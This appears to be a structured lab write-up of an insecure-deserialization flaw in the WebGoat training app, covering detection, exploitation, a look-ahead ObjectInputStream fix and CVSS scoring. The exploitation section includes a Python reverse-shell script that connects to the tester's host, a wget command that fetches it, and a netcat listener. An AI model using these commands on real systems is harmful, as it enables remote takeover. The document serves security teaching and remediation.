## Version 1.4.1
## language: en

Feature:
  TOE:
    WebGoat
  Category:
    Insecure Deserialization
  Location:
    /WebGoat/InsecureDeserialization/task - token (Field)
  CWE:
    CWE-502: Deserialization of Untrusted Data
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Get RCE via insecure deserialization
  Recommendation:
    Harden java.io.ObjectInputStream

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running WebGoat on http://localhost

  Scenario: Normal use case
    Given I go to "WebGoat/start.mvc#lesson/InsecureDeserialization.lesson/4"
    And I get a token and a field to submit it
    Then I submit the token
    Then I get a message
    """
    Sorry the solution is not correct, please try again.
    """

  Scenario: Static detection
  Host header directly sent to user
    Given I check the code at
    """
    webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat/
    plugin/InsecureDeserializationTask.java
    """
    And I see
    """
    56  AttackResult completed(@RequestParam String token) throws IOException {
    57  String b64token;
    58  byte [] data;
    59  ObjectInputStream ois;
    60  Object o;
    61  long before, after;
    62  int delay;
    63
    64  b64token = token.replace('-', '+').replace('_', '/');
    65  try {
    67      data = Base64.getDecoder().decode(b64token);
    68      ois = new ObjectInputStream( new ByteArrayInputStream(data) );
    69  } catch (Exception e) {
    70      return trackProgress(failed().build());
    71  }
    72
    73  before = System.currentTimeMillis();
    74  try {
    75      o = ois.readObject();
    76  } catch (Exception e) {
    77      o = null;
    78  }
    """
    Then I notice it's deserializing the recieved object directly
    Then I know it's vulnerable to insecure serialization

  Scenario: Dynamic detection
  Detecting Insecure Deserialization
    Given I intercept the token submission request with Burp
    """
    POST /WebGoat/InsecureDeserialization/task HTTP/1.1
    Host: 127.0.0.1:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1:8000/WebGoat/start.mvc
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 130
    Connection: close
    Cookie: JSESSIONID=61A6299D90E972C1F4AFCC58A11F4559;
    BEEFHOOK=sPHOtf4WZ9fRh2UjERRZ6BnmNPJLA6QodYTIyeHINl2ARB9X8B15XTd3ZITqq7CWMcz
    xQSjSeGdfc9De

    token=rO0ABXQAVklmIHlvdSBkZXNlcmlhbGl6ZSBtZSBkb3duLCBJIHNoYWxsIGJlY29tZSBtb3
    JlIHBvd2VyZnVsIHRoYW4geW91IGNhbiBwb3NzaWJseSBpbWFnaW5l
    """
    Then I notice the sent token starts with rO0
    Given base64 payloads starting with rO0 are usually serialized java objects
    Then I check for insecure deserialization vulnerabilities using Burp
    And find there's a potential vulnerability (evidence)[scan.png]
    Then I try sending a payload that pings a server I control
    And listen for ICMP in my server
    Then I start getting pings from the victim
    Then I know I can run commands in the victim machine through this vuln

  Scenario: Exploitation
  Getting a shell on target
    Given the target is vulnerable to command injection through Deserialization
    And java's command execution doesn't support complex commands
    Then I write a python script that spawns a shell and connects to my machine
    """
    import socket,subprocess,os
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("myip",4444));os.dup2(s.fileno(),0);
    os.dup2(s.fileno(),1);os.dup2(s.fileno(),2)
    import pty
    pty.spawn("/bin/bash")
    """
    And I host it through a python simpleserver
    Then I open a netcat listener in my machine
    Then I repeat the deserialization attack injecting the command
    """
    wget http://myip/revershell.py -P /tmp/revershell.py
    """
    Then I do it again with
    """
    python3 /tmp/revershell.py
    """
    And get a connection in my listener
    """
    ➜  ~ nc -lvp 4444
    listening on [any] 4444 ...
    connect to [127.0.0.1] from localhost [127.0.0.1] 52930
    ~/tmp#
    """
    Then I have total access to the target system

  Scenario: Remediation
  Harden OIS against deserialization attacks
    Given I create a OIS subclass that only allows deserialization of Token objs
    """
    01  public class LookAheadObjectInputStream extends ObjectInputStream {
    02
    03      public LookAheadObjectInputStream(InputStream inputStream) throws
    04      IOException {
    05          super(inputStream);
    06      }
    07
    08      /**
    09      * Only deserialize instances of our expected Token class
    10      */
    11      @Override
    12      protected Class<?> resolveClass(ObjectStreamClass desc) throws
    13      IOException,
    14              ClassNotFoundException {
    15          if (!desc.getName().equals(Token.class.getName())) {
    16              throw new InvalidClassException(
    17                      "Unauthorized deserialization attempt",
    18                      desc.getName());
    19          }
    20          return super.resolveClass(desc);
    21      }
    22  }
    """
    Then patch the insecure method to use this instead of OIS
    """
    56  AttackResult completed(@RequestParam String token) throws IOException {
    57  String b64token;
    58  byte [] data;
    59  LookAheadObjectInputStream ois;
    60  Token o;
    61  long before, after;
    62  int delay;
    63
    64  b64token = token.replace('-', '+').replace('_', '/');
    65  try {
    67      data = Base64.getDecoder().decode(b64token);
    68      ois = new LookAheadObjectInputStream( new ByteArrayInputStream(data)
    );
    69  } catch (Exception e) {
    70      return trackProgress(failed().build());
    71  }
    72
    73  before = System.currentTimeMillis();
    74  try {
    75      o = (Token)ois.readObject();
    76  } catch (Exception e) {
    77      o = null;
    78  }
    """
    Then when I try to launch a deserialization attack again, nothing happens
    Then the vuln is no more

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.5/10 (High) - AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.9/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.1/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-03